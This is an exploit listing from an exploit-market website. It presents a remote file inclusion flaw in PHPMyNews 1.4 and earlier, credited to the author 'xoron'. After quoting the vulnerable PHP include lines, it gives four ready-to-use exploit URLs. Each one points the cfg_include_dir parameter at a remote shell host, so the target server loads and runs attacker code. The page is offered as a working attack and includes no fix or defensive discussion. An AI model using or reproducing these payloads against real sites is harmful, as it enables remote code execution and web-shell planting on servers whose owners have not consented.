[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHPMyNews <= 1.4 (cfg_include_dir) Remote File Include Vulnerabilities

Author
xoron
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-933
Category
web applications
Date add
07-10-2006
Platform
unsorted
======================================================================
PHPMyNews <= 1.4 (cfg_include_dir) Remote File Include Vulnerabilities
======================================================================



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

PHPMyNews 1.4 <= (cfg_include_dir) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by XORON(turkish hacker)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

CODE:

require($cfg_include_dir.'langues/'.$cfg_language.'.inc'.$cfg_ext);
require($cfg_include_dir.'database/'.$cfg_database.'.inc'.$cfg_ext);
require($cfg_include_dir.'form.inc'.$cfg_ext);


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:

http://www.hedef.com/[phpmynews_path]/include/disp_form.php3?cfg_include_dir=http://sh3LL?
http://www.hedef.com/[phpmynews_path]/include/disp_smileys.php3?cfg_include_dir=http://sh3LL?
http://www.hedef.com/[phpmynews_path]/include/little_news.php3?cfg_include_dir=http://sh3LL?
http://www.hedef.com/[phpmynews_path]/include/index.php3?cfg_include_dir=http://sh3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: Preddy, Ironfist, Stansar, SHiKaA, O.G,

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=




#  0day.today [2024-12-25]  #